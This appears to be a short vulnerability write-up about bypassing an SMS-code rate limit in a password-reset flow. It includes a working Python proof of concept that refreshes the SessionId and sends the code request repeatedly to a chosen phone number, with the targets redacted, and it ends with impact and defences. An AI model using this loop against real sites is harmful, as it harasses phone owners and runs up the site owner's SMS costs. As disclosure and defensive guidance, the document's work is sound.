0x01 Vulnerability Verification:

SMS-related website functions may have such vulnerabilities

For example: register account, change password, bind mobile phone and other important functions

The login interface is shown below, click forgot password

The process of retrieving the password is as follows:

Verify that it needs to wait 60s after each verification code is sent

Try to refresh the page and send the SMS again, and found that the message was sent successfully

burp captures packets and finds that the SessionId changes every time the page is refreshed, so try to modify the SessionId

Get SessionId

F12 finds the SessionId in the response packet

Regular expression to extract SessionId:

 page_text = s.post(url=id_get_url, headers=headers, data=data).textex = 'SessionId"]="(.*?)";'SessionId = re.findall(ex, page_text)[0]

Because the SessionId corresponds to a cookie, after obtaining the SessionId from the first url, the request header should also bring the cookie, and then request the second url. In order to facilitate the use of requests.Session() to create a Session object, the cookie will be automatically obtained

The POC is as follows:

import requestsimport reimport timefor i in range(13): # Send SMS 13 timess = requests.Session()headers = {'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome \/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62",}id_get_url = "https://CanNotTellYou.com/test"data = {'tranFlag': 0,'netType': 7,'Language': 'zh_CN','PlatFlag': 3,'ComputID': 10,'StructCode': 1,'customerGroup': 1010,'channelCode': 302,'User_browser': 'Chrome:98.0.4758.102','User_os': 'Windows10',}page_text = s.post(url=id_get_url, headers=headers, data=data).textex = 'SessionId"]="(.*?)";'SessionId = re.findall(ex, page_text)[0]# with open('./page_text.html', 'w', encoding='utf-8') as f:# f.writelines(page_text)url = 'https://AgainNoTellYou.com/test'post_data = {'tranFlag': 1,'loginID': 12345678978, # phone number'SessionId': SessionId,'tranCode': 'A00012','StructCode': 1,}response = s.post(url=url, headers=headers, data=post_data)print(response.text)time.sleep(2)

The verification results are as follows:

0x02 vulnerability harm:

• From a company perspective:

Sending a registered SMS verification code will pay a certain fee to the SMS provider. Although a text message may cost a few cents, if the website has SMS loopholes, it can cause great losses if it is exploited by people with intentions

• From the user's point of view:

harassment to users of the site

0x03 Defensive Stance:

In the above example, although there is a limit on the total number of SMS received by each number per day, the interval time limit for sending is simply identified by SessionId. More reasonable methods are as follows:

• A timer is generated for each number at the back end, and it will not be resent within a specified time
• Restrict the number and frequency of POST submissions per minute for users with the same IP
• Enter the correct image and text verification code every time you submit a text message